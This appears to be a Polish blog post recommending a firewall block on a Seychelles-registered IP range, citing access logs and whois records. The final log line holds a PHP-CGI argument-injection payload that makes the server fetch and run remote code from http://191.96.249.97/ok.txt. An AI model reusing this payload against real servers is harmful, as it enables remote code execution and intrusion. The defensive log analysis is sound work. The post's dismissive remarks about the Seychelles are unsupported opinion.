img

Do zablokowania na firewallu: 191.96.249.0/24

img

Seszele – obok Ukrainy, Rosji i Chin – są najwyraźniej rajem dla internetowych włamywaczy. Jeśli nie prowadzisz działalności gospodarczej, która obejmuje zasięgiem cały świat, rozważ zablokowanie na firewallu poniższych adresów IP.

Do zablokowania: 191.96.249.0/24

Maszyna pod tym adresem IP regularnie skanuje witrynę pod kątem niezabezpieczonych skryptów i PHPMyAdmina.

Dowód:

191.96.249.97 - - [14/Mar/2017:21:18:05 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-"
191.96.249.97 - - [16/Mar/2017:00:21:43 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-"
191.96.249.97 - - [16/Mar/2017:21:45:57 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-"
191.96.249.97 - - [18/Mar/2017:09:55:44 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-"
191.96.249.97 - - [19/Mar/2017:00:49:48 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-"
191.96.249.97 - - [20/Mar/2017:11:01:09 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-"
191.96.249.97 - - [20/Mar/2017:22:02:05 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-"
191.96.249.97 - - [21/Mar/2017:22:31:45 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 169 "-" "-" "-"
191.96.249.97 - - [23/Mar/2017:00:02:44 +0100] "GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+max_execution_time%3D0+-d+disable_functions%3D\x22\x22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp://191.96.249.97/ok.txt+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n HTTP/1.1" 404 7970 "-" "-" "-"

Poziom zagrożenia: niski

Zalecana akcja: zablokować na firewallu cały zakres adresów IP z puli od 191.96.249.1 do 191.96.249.255.

Do kogo należy adres 191.96.249.97?

Łatwo sprawdzić z użyciem polecenia whois, że adres należy do większej puli 191.96.249.0/24, którą zarządza firma na Seszelach:

$ whois 191.96.249.97
% LACNIC resource: whois.lacnic.net

%  2017-03-29 07:11:28 (BRT -03:00)

inetnum:     191.96.249/24
status:      reallocated
owner:       Dmzhost Limited
ownerid:     SC-DMLI1-LACNIC
responsible: JUPITER 25 LIMITED
address:     Francis Rachel Street, , Suite 1, Second Floor
address:      - Victoria -
country:     SC
phone:       +248 371 23801010 []
owner-c:     CHP23
tech-c:      CHP23
abuse-c:     CHP23
created:     20151217
changed:     20160423
inetnum-up:  191.96/16

nic-hdl:     CHP23
person:      CRS P
e-mail:      abuse@DMZHOST.CO
address:     Suite 4 Second Floor, ,
address:      - Victoria -
country:     SC /Seszele - red./
phone:       +248  37123801010 []
created:     20160423
changed:     20160522


Co się stanie po zablokowaniu?

Wszystkie urządzenia pod adresami IP 191.96.249.1, 191.96.249.2, …, 191.96.249.255 przestaną widzieć naszą maszynę.

Oznacza to, że nie wejdą na naszą stronę WWW i nie połączą się z serwerem plików. Ale jeśli będą mieli do nas sprawę, zawsze mogą zadzwonić lub napisać e-mail (i z pewnością im na tym zależy… 😉

Dlaczego warto zablokować całą pulę adresów?

W tym konkretnym przypadku adresy IP należą do firmy zarejestrowanej na Seszelach, czyli kraju położonego na krańcu cywilizowanego świata. Przy takiej odległości policja nie ruszy nawet palcem, jeśli nie będzie miała do czynienia z międzynarodową sprawą kryminalną.

Dlatego włamywacz może czuć się bezkarnie.

img

Dlatego też warto zawczasu utrudnić mu pracę – i zablokować go na firewallu.

[Głosów:1    Średnia:4/5]
img
Tagi: , , , , , , , , , , ,
img
img
img
img